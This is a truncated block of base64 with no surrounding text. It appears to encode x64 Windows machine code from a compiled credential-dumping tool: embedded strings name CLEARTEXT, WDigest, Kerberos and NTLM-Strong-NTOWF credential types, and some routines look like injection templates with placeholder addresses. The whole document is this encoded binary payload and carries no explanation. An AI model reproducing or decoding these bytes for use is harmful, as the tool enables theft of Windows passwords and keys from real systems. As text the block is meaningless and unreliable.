V2xICAEiL8EiFwHRnSIMgAEyNRCQoSIvQSIvPiVgI6HD3/v+FwHRDSItcJEBIhdt0OTP/OTt2KovHSAPAi0zDEIXJdBdEi0TDDEWFwHQNSI0UC4tMwwjoKAAAAP/HOzty1kiLy/8VfRICAEiLzv8VdBICAEiLXCRgSIt0JGhIg8RQX8NIiVwkCEiJbCQQSIl0JBhXSIPsIEGL6EiL+ovZg/kGcw1IjRUkHAMASIsU2usHSI0VR4ADAEiNDchjBADoF9P+/zP2hdsPhG4BAAD/yw+ETwEAAP/LD4T8AAAA/8sPhKYAAAD/y3Qi/8t0C0SNRgGL1el/AQAASI0NL2UEAOjW0v7/i9XpaQEAAESLRxAPt1cMRItPFEiNDVBkBABMA8dI0erosdL+/0QPt0cESI1XGEyNDf1jBABIi8/oEQIAAEQPt0cGTI0NkWQEAEiL0EiLz+j6AQAARA+3RwhMjQ3qYwQASIvQSIvP6OMBAABED7dHCkyNDYtkBABIi9BIi8/ozAEAAOkAAQAARItHDA+3VwhIjQ1kYwQATAPHSNHq6DXS/v9ED7dHBEiNVxBMjQ2BYwQASIvP6OUAAABED7dHBkyNDYVjBABIi9BIi8/ozgAAAOmyAAAAQDh3Aw+GqAAAAI1eAUiNDfliBACL0+jm0f7/RTPAi85I/8FBjVAQSMHhBEgDz+jeDv//SI0NozADAOjC0f7/D7ZHA4vzO9hywetnSIvVSI0NoGIEAEyLx0jR6uih0f7/61BIjQ1UYgQA6JPR/v9AOHchdBBFM8BIjU8QQY1QEOiNDv//SI0NSmIEAOhx0f7/QDh3IHQQuhAAAABFM8BIi8/oaw7//0iNDTAwAwDoT9H+/0iLXCQwSItsJDhIi3QkQEiDxCBfw8zMSIvESIlYCEiJaBBIiXAYSIl4IEFWSIPsIDP/QQ+32EiL8kyL8WZFhcB0XE2FyXQPSI0N9RIEAEmL0ej50P7/Zjv7c0NIjX4MD7fri0/86NGC//9IjQ1aYwQASIvQ6NbQ/v+LTwSLF0kDzkUzwOjWDf//SI0Nmy8DAOi60P7/SI1/FEj/zXXESItsJDhIi3wkSA+3w0iLXCQwSI0MgEiNBI5Ii3QkQEiDxCBBXsPMzMxIi8RIiVgISIloEEiJcBhIiXggQVZIg+wgM/ZBD7fYSIv6TIvxZkWFwHRgTYXJdA9IjQ1FEgQASYvR6EnQ/v9mO/NzR0iNdxAPt+uLTvzoIYL//0SLRwhIjQ2+YgQASIvQ6CLQ/v+LTgSLFkkDzkUzwOgiDf//SI0N5y4DAOgG0P7/SI12GEj/zXXASItsJDhIi3QkQA+3w0iLXCQwSI0MQEiNBM9Ii3wkSEiDxCBBXsPMzMxIiVwkEEiJdCQYSIl8JCBVQVRBVUFWQVdIi+xIg+xwTIt9WEyLZVBJi8FIi/FJi9iL+kiNDZdiBABNi89Ni8RIi9DHRcgSAAAAx0XMEQAAAMdF0BcAAADoeM/+/0Uz7UiF9g+EcAEAAIX/D4SsAgAASIl9MEiNXghMjS2pFwMASI09gmIEAEG+AwAAAEiNDWViBADoPM/+/0iLzuicDf//gzsEcwmLA0mLVMUA6wNIi9eDOwRIjQVlYgQASI0NdmIEAEgPQsjoCc/+/4tTBEiLSwhBuAEAAADoBwz//0iNDcwtAwDo687+/4M7Ag+FzwAAADPAuUAAAABmiUXYQQ+3BCRmQQMHZgMFQ3QFAA+30GaJRdr/Fb4NAgBIiUXgSIXAD4SaAAAASI1N2EmL1P8VDBECAEiNFRV0BQBIjU3Y/xX7EAIASI1N2EmL1/8V7hACAA+3QwRMjW3IZolF6maJRehIi0MISIlF8E2L5kGLTQBIjVXA/xUdEAIAhcB4JEGLTQCJRCQoSI1FwEyNRdhIjVXoQbkAEAAASIlEJCDouWn//0mDxQRJ/8x1wUiLTeD/FSoNAgBMi2VQTI0tZxYDAEiDxhhIg8MYSP9NMA+Fuf7//+lEAQAASIXbD4Q7AQAASI0NEGEEAOjnzf7/SIvL6EcM//+DewgEcxCLQwhIjQ0jFgMASIs8wesHSI099mAEAIN7CARIjQ0DYQQASI0FFGEEAEgPQsFIi9dIi8jooc3+/4tTDEiNexBIi89BuAEAAADonAr//0iNDWEsAwDogM3+/4N7CAIPhb4AAABBD7cEJLlAAAAAZkSJbdhmQQMHZgMF2HIFAA+30GaJRdr/FVMMAgBIiUXgSIXAD4SKAAAASI1N2EmL1P8VoQ8CAEiNFapyBQBIjU3Y/xWQDwIASI1N2EmL1/8Vgw8CAA+3QwxIiX3wZolF6maJRehIjV3IQb4DAAAAiwtIjVUw/xW1DgIAhcB4IosLiUQkKEiNRTBMjUXYSI1V6EG5ABAAAEiJRCQg6FNo//9Ig8MESf/OdcVIi03g/xXECwIASI0NjSsDAOiszP7/TI1cJHBJi1s4SYtzQEmLe0hJi+NBX0FeQV1BXF3DzMxIiVwkCEiJdCQQVVdBVkiNbCTwSIHsEAEAAEUz9ovxSIv6SI1N4EWNRigz0kSJdUhEiXXY6BfrAABEOTWYrQUASI0FuawFAEyJdCRgSIlFkEiJRYBMiXQkcEyJdYhMiXQkeA+FOQEAAEyNBfFUBABFM8lIi9eLzkyJdCQg6AsM//+FwA+EGAEAAIsVgcAFAEGL3kiNBZdxBQBBi845EHcRSIPBUEiL2EiDwFBIg/lQcutIhdsPhI0DAABIi0MQSI1MJHC6OAQAAEiJRYhIi0MgSIlEJHjoCvb//4XAD4RlAwAAgT0kwAUA8CMAAEiLTCRwSI0FAFMEAEiNFQFfBABMjUWYSA9C0Ogk2P7/hcB0eItFqItLGA8QRZhEi0MISIl8JEBIiUXI8w9/RbhIjQXN/v//iXQkOEyNTCR4SIlEJDCLQyhIjVWIiUQkKEiJTCQgSI1NuMcFeawFAAEAAADonMz+/4XAdRT/FVoKAgBIjQ2rXgQAi9DoEMv+/0SJNVWsBQDpvwIAAP8VOgoCAEiNDfteBACL0Ojwyv7/6aYCAABMjUwkaEiNVdhBuAEAAAAzyf8V6AQCAIXAD4iHAgAASItMJGhMjUQkWLoMAAAA/xXDBAIAhcAPiF8CAABIi0wkWEUzwEiDwRBIi9H/Ff4MAgBMi0QkWEiNDUpfBABJjVAQ6IXK/v9Ii0wkWEw5cUB0EUiNDT9QBADobsr+/0iLTCRYSItJQOgkCf//SI0NKWEDAOhUyv7/RIl1SOmsAQAAhcB0Cz0FAQAAD4XIAQAAQYv+hckPhIcBAABIi0wkUIvHRTPASGvYOEgDy0iL0f8VewwCAEiLVCRQSI0N/14EAEgD00yNQhDo/8n+/0iLTCRQTDl0CyB0EUiNDbhPBADo58n+/0iLTCRQSItMCyDonAj//0iNDaFgAwDozMn+/0iLVCRQSItMJGhMjUwkYEgD00G4BwAAAP8VGgUCAIXAD4jjAAAASItMJFBIi0QkWEyNDbFeBABIA8tIg8AQRTPASIlMJChIi0wkYEiJRCQgixFIi0kI6J35//9Ii1QkWEiLTCRQSAPLSIPCEEyNDYVeBABIiVQkKEiJTCQgSItMJGCLURhIi0kgRTPA6Gf5//9Ii0wkUEiLRCRYSAPLSIPAEEyNDV9eBABIiUwkKEiLTCRgRTPAixFIi0kQSIlEJCDoMvn//0iLVCRYSItMJFBIA8tIg8IQTI0NOl4EAEiJVCQoSIlMJCBIi0wkYItRGEiLSShFM8Do/Pj//0iLTCRg/xVRBAIA6w5IjQ0gXgQAi9Dotcj+///HO31AD4J5/v//SItMJFD/FSsEAgBIi0wkaEiNRUBMjUQkUEiNVUhFM8lIiUQkIP8VAwQCAItNQIXJD4Up/v//PRoAAIB0EoXAdA5IjQ1WXgQAi9DoW8j+/0iLTCRY/xXcAwIASItMJGj/FWECAgBMjZwkEAEAADPASYtbIEmLcyhJi+NBXl9dw8zMzEiJXCQISIl0JBBXSIPsUEiL2UiNTCRASYv5SYvw/xUJCgIASI1MJDBIi9P/FfsJAgBMjUwkKEiNTCQwQbgEAAAASIvX/xXyAQIAi9iFwHhrSItMJChMjUQkIEiNVCRA/xU/AwIAi9iFwHhFSItEJCC5QAAAAA8QAPMPfwYPt1YC/xWmBgIASIlGCEiFwHQWSItUJCBED7dGAkiLyEiLUgjo55ABAEiLTCQg/xUEAwIASItMJCj/FYkBAgBIi3QkaIvDSItcJGBIg8RQX8PMzMxIi8RIiVgISIloEEiJcBhXQVRBVUFWQVdIg+xQSIvaSI1QyEWL8UGL8EyL+f8VegkCAEUz7YXAD4hDAgAARA+3RCRASItEJEhMjSVNDgQASdHoZkaJbED+SIt8JEiLA0iDxwL/yA+EWQEAAP/IdGCLE0iNDQReBADo28b+/0G4AAAgAIvWSIvL6NsD//9IjQ2gJQMA6L/G/v9FhfYPhNMBAABIjQWzXQQASI0VzHMDAEiNDTVdBABMi89FM8BIiUQkIOjFqf//SIvr6V8BAABIjQ32XAQA6H3G/v9Ei0METI1rDEmL1UG5AQAAAEmLz+gwL///i1METI0N7lwEAEUzwEmLzUSJdCQwSIl8JCjonaD//0WF9g+EWQEAAItDBItzCEiNawxIA+hIjQU0EAQASI0VHaYDAEiNDa5cBABMi89FM8BIiUQkIOg+qf//TIvwSIXAdEBEi0sETYvFi9ZIi81IiUQkKOg0p///SI0dIQ0EAEmL1IXASI0NfVwEAE2LxkgPRdPozcX+/0mLzv8V0AQCAOsHSI0d9wwEAEiNBXgOBABIjRWppQMASI0NOlwEAEyLz0UzwEiJRCQg6Mqo///rcUiNDXFcBADoiMX+/0iNawSDxvxFM8lEi8ZJi89Ii9XoPC7//0G4AAAgAIvWSIvN6HAC//9IjQ01JAMA6FTF/v9FhfZ0bEiNBUxcBABIjRVNXAQASI0NzlsEAEyLz0UzwEiJRCQg6F6o//9IjR1fDAQASIv4SIXAdDhIhe10KoX2dCZEi8ZIi9VIi8joDKT+/0iNDWFcBABMi8eFwEwPReNJi9To7MT+/0iLz/8V7wMCAEiNTCRA/xXUBgIATI1cJFBJi1swSYtrOEmLc0BJi+NBX0FeQV1BXF/DzMxIi8RIiVgISIlwEEiJeBhVQVZBV0iNaKFIgezQAAAADxAFNlwEAPIPEA0+XAQAi/Iz0k2L8EiL+UiNTb9EjUJKuwEAAMAPKUWn8g8RTbfoKeMAAEiNVZdFM/9Ii89mRIl9B/8VpAYCAIXAD4iTAAAASItFn0iNTZcPEEACDxFFvQ8QSBIPEU3NDxBAIg8RRd0PEEgyDxFN7fIPEEBC8g8RRf3/FQwGAgBFjUcoSI1NHzPSRIl9F+jB4gAATI1NF0yNRZdIjVWnSYvO6MH7//+L2IXAeCBED7dFl0iLVZ9Ei85Ii8/od/z//0iLTZ//FdECAgDrDkiNDYBbBACL0Oi1w/7/TI2cJNAAAACLw0mLWyBJi3MoSYt7MEmL40FfQV5dw8zMSIlcJAhVVldIi+xIgeyAAAAASINlOABIg2UwAEiDZCQgAEyNBSfNAwBFM8lIi9qL+eheA///SINkJCAATI0FXU0EAEUzyUiL04vPi/DoQgP//0iDZCQgAEyNTTBMjQXtcAMASIvTi8/oJwP//0iDZCQgAEyNTThMjQUqKwQASIvTi8/oDAP//0iLXThIhdt0akiNTbBIi9P/FfoEAgBIjVXASI1NsP8VNAUCAIXAeDVIjQ25IQMA6NjC/v9IjU3A6F8B//9IjQ08WwQA6MPC/v9Mi0UwSI1NwIvW6Pz9///pCwEAAEiNDVxbBABMi8OL0Oiewv7/6fUAAABIjQ2+WwQA6I3C/v+DZdAAvygAAABIjU3YRIvHM9LoOuEAAEiLXTBMjU3QTI1FsEiNFc9bBABIi8voM/r//4XAeC9Ii0246N4A//9IjQ0jIQMA6ELC/v9Ii024TIvDi9bofP3//0iLTbj/FTYBAgDrDkiNDcVbBACL0Ogawv7/SI0NT1wEAOgOwv7/g2XQAEiNTdhMi8cz0ujA4AAATI1N0EyNRbBIjRVpXAQASIvL6L35//+FwHgvSItNuOhoAP//SI0NrSADAOjMwf7/SItNuEyLw4vW6Ab9//9Ii024/xXAAAIA6w5IjQ1PWwQAi9DopMH+/zPASIucJKAAAABIgcSAAAAAX15dw8zMzEiLxEiJWAhXSIPscEiDYBgASINgqABMjQUrywMARTPJSIvai/noYgH//0iDZCQgAEyNBWFLBABFM8lIi9OLz+hIAf//SINkJCAATI2MJJgAAABMjQWPvAMASIvTi8/oKQH//4XAD4STAAAASINkJCAATI2MJJAAAABMjQXIbgMASIvTi8/oAgH//4NkJEAAM9JEjUIoSI1MJEjosd8AAEiLlCSYAAAASIXSdBlIi4wkkAAAAEyNTCRATI1EJDDoofj//+sFuAEAAMCFwHgiD7dUJDBIi0wkOEG4AQAQAOi5/f7/SItMJDj/Far/AQDrDkiNDTlbBACL0OiOwP7/M8BIi5wkgAAAAEiDxHBfw8zMSIlcJAhWV0FUQVZBV0iB7CACAABMi/JEi+Ez20iJXCRISIlcJFiJXCR4M9JEjUM4SI1MJHzoBt8AAImcJMAAAAC/pAAAAESLxzPSSI2MJMQAAADo6N4AAImcJGACAACJnCRwAQAARIvHM9JIjYwkdAEAAOjI3gAASIlcJGBIiVwkcEiJXCRoSImcJGgCAABEi/tIiVwkUEiJXCQgTI1MJGhMjQVQ1QMASYvWQYvM6Mn//v+FwHUZSI1MJEjo67L+/4XAdAtIi0QkSEiLcBjrBUiLdCRoSIX2D4RJAwAAui4AAABIi87oAcYAAEiFwA+EMwMAAEiL1kiNDcJaBADoeb/+/0iJXCQgTI2MJGgCAABMjQXlWgQASYvWQYvM6Fr//v+FwHVFSIlcJCBMjYwkaAIAAEyNBc5aBABJi9ZBi8zoN//+/4XAdSJMjUQkUEiLzujCsv7/SIu8JGgCAABMi3wkUIXASQ9F/+sISIu8JGgCAABIhf8PhKICAABIi9dIjQ2KWgQA6PG+/v9IiVwkIEyNTCRwTI0F9CYEAEmL1kGLzOjV/v7/hcB1LEiJXCQgTI1MJGBMjQUs1AMASYvWQYvM6LX+/v+FwHUMSI0NXl0EAOlXAgAATIt0JHBNhfZ0DEmL1kiNDW1aBADrDEiLVCRgSI0Np1oEAOh+vv7/SI1UJEBIi8/oLej+/4XAD4QgAgAASI2EJIAAAABIiUQkMEyJdCQoSItEJGBIiUQkIEyNjCTAAAAATIvGSIvXSI1MJEDonen+/4XAD4S5AQAATI1EJFhIjZQkwAAAAEiNTCRA6Jrs/v+FwA+EmgEAAEiNRCR4SImEJOAAAADHhCQIAQAAMIAoAEG+AQAAAESJtCQMAQAAx4QkEAEAAAAAoADHhCQUAQAABgAAAEiNhCRwAQAASIlEJDhIjYQkYAIAAEiJRCQwSI2EJMAAAABIiUQkKMdEJCAIAAAATItMJFhFM8BBjVYCSI0N9NYCAP8V7v0BAIXAD4XDAAAAg7wkYAIAAAYPhZMAAABEObQk5AEAAA+FhQAAAEiLjCTwAQAA6PHu/v+FwHRrSIu8JPABAABIg8cYQbgBAAkASIvXSI0NZV4EAOicAQAASI0NCRwDAOgovf7/RTPJRTPAut0ACQBIi8/oBQEAAEiLz0iFwHQH6JACAADrMbqFAAkA6OwAAABIhcB0IkiL1kiLz+gQCQAA6xVIjQ1XWQQA6wdIjQ3eWQQA6NW8/v9IjZQkcAEAAIuMJGACAADo3fH+/+sRRIvAi9BIjQ1nWgQA6K68/v9MjUwkWEUzwEGL1kiNDQDWAgD/Ffr8AQBIiYQkaAIAAOsYRIvAi9BIjQ20WgQA6Hu8/v8z20yLfCRQSI1MJED/Fb38AQCFwHUcSIlcJEDrFUiNDYtbBADrB0iNDQJcBADoSbz+/02F/3QJSYvP/xVH+wEASItMJEhIhcl0Bv8Vt/cBADPASIucJFACAABIgcQgAgAAQV9BXkFcX17DzEiJXCQISIl8JBBFM9KL+kiL2U2FwHQDTSEQTYXJdANFIRFFM9tEORF2PkiLUQhLjQxbOTzKdApB/8NEOxty7+sng3zKCAF1IEiLRMoQTItQCE2FwHQDTYkQTYXJdApIi0zKEIsRQYkRSItcJAhIi3wkEEmLwsPMzESJTCQgU0iD7EBBi8BMi9JIi9lMjUQkMEyNTCRoi9BJi8roYf///0iFwHQzRItEJGhMi0wkMEiNBTcaAwBJ0ehIhdtIjRVCGAMASI0Nm1sEAEgPRdNIiUQkIOg5u/7/SIPEQFvDzMzMSIlcJAhIiWwkEESJRCQYVldBVkiD7DAz/zPbTYvxi+pIi/GF0nR7TI1EJCBIjVQkYEiLzv8VavYBADP/hcBAD5nHhf90RYN8JHAASYvWdBVEi8NIjQ1CWwQAQcHoBOjNuv7/6wxIjQ1QWwQA6L+6/v9FM8BIjUwkIEGNUBDovvf+/0iNDYMZAwDrB0iNDUJbBADombr+/4PDEEiDxhA73XKFSItcJFBIi2wkWIvHSIPEMEFeX17DzEiJXCQISIl0JCBVV0FWSIvsSIPsMEiL+UiNDfVhBADoVLr+/0iNDRFiBABBuN0ACQBIi9fop/7//0iNDSxiBABBuJACCQBIi9fokv7//0yNRShFM8m6LgEJAEiLz+gG/v//SIXAD4SyAAAASItFKIsQuAAAADA70HdUdEmLwoXSdDotAAAAEHQq/8h0HS3///8PdA3/yHVOTI0FpWAEAOtwTI0FfGAEAOtnTI0FO2AEAOteTI0FEmAEAOtVTI0F6V8EAOtMTI0FsGAEAOtDi8ItAQAAMHQz/8h0Ji3+//8PdBb/yHQJTI0Fr2YDAOsiTI0F/mAEAOsZTI0F1WAEAOsQTI0FrGAEAOsHTI0Fg2AEAEiNDYRhBADoW7n+/0yNRShFM8m6CAAJAEiLz+g3/f//SIXAdEpMi3UoSI0No2EEAEGLFugvuf7/M9tIjTVaAAMAQYsGD6PYcw9IixZIjQ2wkQMA6A+5/v//w0iDxgiD+yBy3kiNDc1PAwDo+Lj+/0yNRShFM8m6nwAJAEiLz+jU/P//SI01uRcDAEiFwHQdSI0NfWEEAOjMuP7/SItNKOgr9/7/SIvO6Lu4/v9MjUUoRTPJumAACQBIi8/ol/z//0iFwHQdSI0Nd2EEAOiWuP7/SItNKOj19v7/SIvO6IW4/v9MjUUoRTPJupIACQBIi8/oYfz//0iFwA+ELQEAAEiNDW1hBADoXLj+/0iLXShIi8voFPf+/0iLzuhIuP7/SIvL/xWb8wEASIvLD7YQ/8r/FYXzAQBIjQ1mYQQAixiL0+ghuP7/SI0NjmEEAOgVuP7/TI1NKEyNRTC6WgAJAEiLz+jw+///SIXAdBuLVShIi00wg2QkIABMjQ1MMgQARIvD6LD8//9MjU0oTI1FMLpeAAkASIvP6Lv7//9IhcB0HotVKEiLTTBMjQ1MYQQARIvDx0QkIAEAAADoePz//0yNTShMjUUwujcACQBIi8/og/v//0iFwHQbi1UoSItNMINkJCAATI0N7zEEAESLw+hD/P//TI1NKEyNRTC6oAAJAEiLz+hO+///SIXAdB6LVShIi00wTI0N72AEAESLw8dEJCABAAAA6Av8//9MjU0oTI1FMLp9AAkASIvP6Bb7//9IhcB0FUiNDc5gBADoFbf+/0iLTTDoFAAAAEiLXCRQSIt0JGhIg8QwQV5fXcPMSIlcJCBIiUwkCFVWV0FUQVVBVkFXSIvsSIPsMDPATIvpSI1xcESL+IlFSGY7QW4Pg8wCAAAPtwZIjVXwSI0NoWAEAGaJRfJmiUXwSI1GBkiJRfhED7cmD7deAkmDxAbR60wD5uiPtv7/i9O5QAAAAESL8/8Vg/UBAEiL+EiFwA+EVgIAAIXbdDNMi/hFi+5MjUVQSI0VXmAEAEmLzOjOxgAAikVQSYPEAkGIB0n/x0n/zXXbTIttQESLfUhIjVXwSI0NjVsFAEGwAf8VNPgBAEUz5ITAD4XWAQAASI1V8EiNDSZdBQBBsAH/FRX4AQCEwA+FugEAAEiNVfBIjQ1iWwUAQbAB/xX59wEAhMB0VEWL9EQ4ZwMPhqoBAABBjV4BSI0N3UYEAIvT6Mq1/v9FM8BBi85I/8FBjVAQSMHhBEgDz+jB8v7/SI0NhhQDAOiltf7/D7ZHA0SL8zvYcr7pYwEAAEiNVfBIjQ1+XAUAQbAB/xWN9wEAhMB0TkSLRwwPt1cISI0NkkYEAEwDx0jR6uhjtf7/RA+3RwRIjVcQTI0Nr0YEAEiLz+gT5P//RA+3RwZMjQ2zRgQASIvQSIvP6Pzj///p/QAAAEiNVfBIjQ2wWgUAQbAB/xUn9wEAhMB0fUSLRxAPt1cMRItPFEiNDZhGBABMA8dI0ero+bT+/0QPt0cESI1XGEyNDUVGBABIi8/oWeT//0QPt0cGTI0N2UYEAEiL0EiLz+hC5P//RA+3RwhMjQ0yRgQASIvQSIvP6Cvk//9ED7dHCkyNDdNGBABIi9BIi8/oFOT//+toSI1V8EiNDXNbBQBBsAH/FZL2AQCEwHQnSI0Nz0YEAOh2tP7/RTPAi9NIi8/oefH+/0iNDT4TAwDoXbT+/+spSI0NYF4EAOhPtP7/QbgBAAAA69RJ0e5IjQ0xRQQATIvHSYvW6DK0/v9IjQ0HEwMA6Ca0/v9Ii8//FSnzAQAPt0YCD7cOQf/HSAPGSI1xBkSJfUhIA/BBD7dFbkQ7+A+CNP3//0iLnCSIAAAASIPEMEFfQV5BXUFcX15dw8zMzEiJXCQISIl8JBBVSIvsSIPsYEiL2UiNDfRdBABIi/rouLP+/0yNTSBMjUUouoUACQBIi8vok/f//0iFwA+E0AAAAItFIEiNVcBIjQ0IXgQAZolFwmaJRcBIi0UoSIlFyOh3s/7/SI1VwEiNTeBBsAH/Fcr1AQCFwA+IlAAAAEiNTfBIi9f/FVX1AQBIjVXwSI1N0EGwAf8VpPUBAIXAeGi/gQAJAEyNTSBMjUUoi9dIi8voFff//0iFwHQTTI1NKEyNReBIjVXQi8/oVQAAAL+HAAkATI1NIEyNRSiL10iLy+jm9v//SIXAdBNMjU0oTI1F4EiNVdCLz+gmAAAASI1N0P8V0PQBAEiNTeD/Fcb0AQBIi1wkcEiLfCR4SIPEYF3DzMxIiVwkCEiJbCQQSIl0JBhXSIPsMEmL2UmL+IH5gQAJAHUTTI0Nq0cEAEiNLcRHBABIi/LrFEyNDahHBABIjS3BRwQASYvwSIv6SIsbgzsAdEODewQAdBpEi0MEM9IzyUwDw0iJfCQoSIl0JCDoc+L//4N7CAB0HUSLQwhMi80z0jPJTAPDSIl8JChIiXQkIOhQ4v//SItcJEBIi2wkSEiLdCRQSIPEMF/DzMzMSIlMJAhXSIHsQAIAAMdEJCQAAAAAx0QkYEMATADHRCRkRQBBAMdEJGhSAFQAx0QkbEUAWADHRCRwVAAAAEiNRCR0SIv4M8C5FAAAAPOqx4QkiAAAAFcARADHhCSMAAAAaQBnAMeEJJAAAABlAHMAx4QklAAAAHQAAABIjYQkmAAAAEiL+DPAuRgAAADzqseEJLAAAABLAGUAx4QktAAAAHIAYgDHhCS4AAAAZQByAMeEJLwAAABvAHMAx4QkwAAAAAAAAABIjYQkxAAAAEiL+DPAuRQAAADzqseEJNgAAABLAGUAx4Qk3AAAAHIAYgDHhCTgAAAAZQByAMeEJOQAAABvAHMAx4Qk6AAAAC0ATgDHhCTsAAAAZQB3AMeEJPAAAABlAHIAx4Qk9AAAAC0ASwDHhCT4AAAAZQB5AMeEJPwAAABzAAAAx4QkAAEAAE4AVADHhCQEAQAATABNAMeEJAgBAAAtAFMAx4QkDAEAAHQAcgDHhCQQAQAAbwBuAMeEJBQBAABnAC0Ax4QkGAEAAE4AVADHhCQcAQAATwBXAMeEJCABAABGAAAASI2EJCQBAABIi/gzwLkEAAAA86q4EgAAAGaJhCQwAQAAuBIAAABmiYQkMgEAAEiNRCRgSImEJDgBAAC4DgAAAGaJhCRAAQAAuA4AAABmiYQkQgEAAEiNhCSIAAAASImEJEgBAAC4EAAAAGaJhCRQAQAAuBAAAABmiYQkUgEAAEiNhCSwAAAASImEJFgBAAC4JgAAAGaJhCRgAQAAuCYAAABmiYQkYgEAAEiNhCTYAAAASImEJGgBAAC4IgAAAGaJhCRwAQAAuCIAAABmiYQkcgEAAEiNhCQAAQAASImEJHgBAABBsQFBuAAAABBIjVQkSDPJSLhBQUFBQUFBQf/QhcAPjAgEAABIjVQkMLkFAAAASLhISEhISEhISP/QhcAPjNkDAABMjUwkQEiLRCQwTItAELoAAAAQSItMJEhIuERERERERERE/9CFwA+MlwMAAEyNTCQoSIuEJFACAABEi0AougAAABBIi0wkQEi4RUVFRUVFRUX/0IXAD4xXAwAAx0QkIAAAAADrCotEJCD/wIlEJCCDfCQgBg+DUgEAAItEJCBIa8AgSMeEBJgBAAAAAAAAi0QkIEhrwCDHhASEAQAAAAAAAItEJCBIa8Agi0wkIImMBIABAACLRCQgSGvAIMeEBJABAACAAAAAg3wkIAB0XItEJCBIa8AgSI2EBIQBAACLTCQgSGvJIEiNjAyYAQAAi1QkIP/Ki9JIa9IQSI2UFDABAABMi8hMi8FIi0wkKEi4Q0NDQ0NDQ0P/0ItMJCBIa8kgiYQMkAEAAOtLi0QkIEhrwCDHhASEAQAAJAAAAItEJCBIa8AgSI2EBJgBAABMi8C6EgAAAEiLTCQoSLhGRkZGRkZGRv/Qi0wkIEhrySCJhAyQAQAAi0QkIEhrwCCDvASQAQAAAHxAi0QkIEhrwCBIg7wEmAEAAAB0LYtEJCBIa8Agg7wEhAEAAAB0G4tEJCBIa8Agi4QEhAEAAItMJCQDyIvBiUQkJOmZ/v//i0QkJEiDwGhIi4wkUAIAAIlBEEiLhCRQAgAAi0AQQbkEAAAAQbgAMAAAi9AzyUi4SkpKSkpKSkr/0EiJRCQ4SIuEJFACAABIi0wkOEiJSBhIg3wkOAAPhHkBAADHRCQkAAAAAEiLhCRQAgAASItAGMcABgAAAMdEJCAAAAAA6wqLRCQg/8CJRCQgg3wkIAYPg0ABAACLRCQgSGvAIIO8BJABAAAAD4wlAQAAi0QkIEhrwCBIg7wEmAEAAAAPhMgAAACLRCQgSGvAIIO8BIQBAAAAD4SyAAAAi0QkJEiDwGiLTCQgSGvJIImEDIgBAACLRCQgSGvAIEiLjCRQAgAASItJGItUJCBIa9IQDxCEBIABAADzD39EEQiLRCQgSGvAIIuEBIQBAACLTCQgSGvJIItUJCBIa9Igi5QUiAEAAEiLvCRQAgAASANXGEiJVCRQRIvASIuUDJgBAABIi0QkUEiLyEi4TExMTExMTEz/0ItEJCBIa8Agi4QEhAEAAItMJCQDyIvBiUQkJIN8JCAAdB6LRCQgSGvAIEiLjASYAQAASLhLS0tLS0tLS//Q6yGLRCQgSGvAILoSAAAASIuMBJgBAABIuEdHR0dHR0dH/9Dpq/7//0iNTCQoSLhCQkJCQkJCQv/QSI1MJEBIuEJCQkJCQkJC/9BIi1QkMLkFAAAASLhJSUlJSUlJSf/QSI1MJEhIuEJCQkJCQkJC/9AzwEiBxEACAABfw7hyYXNsw8zMSIPsOEG4FgAAAEyNDftYBABIjRUMWQQASI0NHVkEAEyJRCQg6J8EAAAzwEiDxDjDSIPsOEG4KgAAAEyNDQtZBABIjRU0WQQASI0NXVkEAEyJRCQg6G8EAAAzwEiDxDjDSIPsOEG4HgAAAEyNDVNZBABIjRVsWQQASI0NhVkEAEyJRCQg6D8EAAAzwEiDxDjDSIPsOEUzyUyNBX5ZBABIjQ3vXgUAQY1RAeiOrf7/M8BIg8Q4w8zMzEiD7ChIOxFyH4tBEEgDAUg70HMUSItRGEiNDV1ZBADoZKr+/zPA6wW4AQAAAEiDxCjDzMxEiUQkGFVTVldBVEFVQVZBV0iNbCThSIHs6AAAADP/TIvpSI1Fb0iJRY+NXwGNTwRBDxBFAEiNRWeJTZ+JTcfzD39EJDhIiUW3jUcCuUwBAACJRb+JRcOLx2Y70UiNDWWKBQBED7fiD5XARIvPSIl8JCCJRctIjUV/xkVv6UiJRd9IjUQkIGbHRWf/JWbHRX9QSMaFgQAAALiJfYdIiUUHiV2XiV2bSIldo4ldr4ldz4l918dF5wMAAADHResDAAAASMdF7wgAAACJffdIiXwkKEiJTCQwSIlND4v3g/4DD4P3AAAAi8ZIjRyARDtE3YcPgtsAAACLTN2fRIt83ZtBA89Ei/GL0blAAAAA/xVG6AEASIlEJChIhcAPhKgAAABIjUwkKEWLxkmL1ejMnv7/hcAPhIAAAABIi3wkKESLRN2XSItM3Y9Ii9foiXEBAIXAdWo5RN2jdBRJYww/SQPOQb5MAQAASANMJDjrF0mLDD9BvkwBAABIiUwkIGZFO+Z1B4vJSIlMJCCDfN2nAHQtSIlMJDhIjVQkOEiNTQdBuAgAAADoU57+/2ZFO+Z1CYtEJCBIiUQkIEiLfCQoSIvP/xWa5wEAM/9Ei0V3TItMJCD/xk2FyQ+EAP///0mLwUiBxOgAAABBX0FeQV1BXF9eW13DzEiLxEiJWAhIiWgQSIlwGFdIg+wwDxBBMDP2M/9Ii+pIi9nzD39A6Eg5cTAPhKUAAAAPtxNIjUwkIESLx+jL/f//SIvISIlEJCBIhcB0GUg7RQByDItFEEgDRQBIO8h20UiL8f/H68pIhfZ0akyLRRhIjQ3tVgQAi9fo4qf+/0iLUxBIhdJ0DkiNDfZWBADozaf+/+sPi1MESI0N9VYEAOi8p/7/SItTMEiNDfVWBABMi8boqaf+/0iLSzhIjRUW/f//TIvG6DKu/v9IjQ1rBgMA6Iqn/v9Ii1wkQEiLbCRISIt0JFC4AQAAAEiDxDBfw0iD7ChIjRUF////TIvB6HG5/v+4AQAAAEiDxCjDzMzMSIlcJBBXSIPsIItZUIP7BA+GlQAAAEiNUThIjQ2LVgQARIvD6Cen/v9Ei8Mz0rkAAACA/xWr5gEASIv4SIXAdFa6EAAAAI1KMP8VBeYBAEiL2EiJRCQwSIXAdBJMjUQkMEiL17kBAAAA6Dqb/v+FwHQaSI0VZ////0UzwEiLy+horf7/SIvL6PSb/v9Ii8//Ff/lAQDrFP8V7+UBAEiNDSBWBACL0Oilpv7/uAEAAABIi1wkOEiDxCBfw8xIg+woSI0NOf///zPS6BKs/v8zwEiDxCjDzMzMSIlcJAhIiXQkGFVXQVRBVkFXSI1sJNFIgezgAAAAM/9IjQXFhgUATYvgIXwkSEiJRc9IiUXfD1fA8w9/RZ9IjUWvTIvySIlVx0iJRCRASCF8JDhIIXwkMEghfCQoIXwkIEyL+UiL0USNRwQzyUmL8UyJTdfoS7b+/4XAD4QiAQAASItdr41XEI1PQP8V